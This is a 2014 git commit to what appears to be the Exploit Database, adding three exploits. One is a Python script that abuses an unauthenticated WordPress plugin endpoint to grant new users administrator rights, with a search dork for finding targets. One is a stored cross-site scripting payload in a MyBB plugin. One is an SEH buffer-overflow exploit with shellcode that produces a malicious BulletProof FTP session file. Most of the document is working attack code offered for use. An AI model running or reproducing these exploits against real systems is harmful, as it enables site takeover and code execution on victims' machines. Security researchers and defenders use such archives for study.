Updated 09_07_2014

This commit is contained in:
Offensive Security 2014-09-07 04:43:33 +00:00
parent bdd1b1c20a
commit fe6788f41b
4 changed files with 113 additions and 0 deletions

View file

@ -31104,3 +31104,6 @@ id,file,description,date,author,platform,type,port
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0

Can't render this file because it is too large.

43
platforms/php/webapps/34538.txt Executable file
View file

@ -0,0 +1,43 @@
#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
#Author : Hannaichi [@dntkun]
#Date : February 5th, 2014
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : Unauthenticated Configuration Access
#Tested On : Windows 7 32-bit | Google Chrome
#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
#POC :
Save File As Python (.py) =
import httplib, urllib
#target site
site = "victim" #<--- no http:// or https://
#path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "youremail@test.com")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
#Place It Broo No Lazy For This :D !!
--------------------------------------------------------------------------------------------------------------------
Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*

30
platforms/php/webapps/34539.txt Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: User Social Networks MyBB Plugin 1.2 - Cross Site Scripting
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - N/A
# Software Link: http://mods.mybb.com/view/user-social-networks
# Version: 1.2
# Tested on: PHP
Description:
This plugin allows you to add social networks, or related, in user
profiles. The information will be shown in a user profile and visible for
anyone who view the profile.
Proof of Concept
1. Login into your account.
2. Go to "Edit Profile" page at "/usercp.php?action=profile"
3. Update your Social Network ID with
"><script>alert(document.cookie)</script><"
4. The result can be seen in multiple places, including your profile page.
* The script will be executed whenever anyone view your profile.
** The result can also be seen in threads you involve IF the administrator
configure this plugin to allow user's social sites information to be
published in every post.
Solution:
Replace the content of "inc/plugins/usersocial.php" with this fix:
http://pastebin.com/T1WgcwDB

37
platforms/windows/dos/34540.py Executable file
View file

@ -0,0 +1,37 @@
# !/usr/bin/python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
# Date: Sep 05 2014 #
# Vulnerability Discovery: Gabor Seljan #
# Exploit Author: Robert Kugler #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP #
# CVE: CVE-2014-2973 #
# #
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
# The "Enter URL" form is also vulnerable #
#-----------------------------------------------------------------------------#
buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
buffer+= "\x20" + "\x90" * 89
buffer+= "\xeb\x06\x90\x90"
buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
buffer+= "\x90" * 119 # 160 characters space
buffer+= ("\x33\xc0\x50\x68"
"\x2E\x65\x78\x65"
"\x68\x63\x61\x6C"
"\x63\x8B\xC4\x6A" # 36 bytes
"\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
"\xfd\xe4\x77\xFF"
"\xD3\x33\xc0\x50"
"\xc7\xc0\x8f\x4a"
"\xe5\x77\xff\xe0")
buffer+= "\x90" * (1000 - len(buffer))
# Just load the "BP Session" and click on "Connect".
file = open("ftpsession.bps","w")
file.write(buffer)
file.close()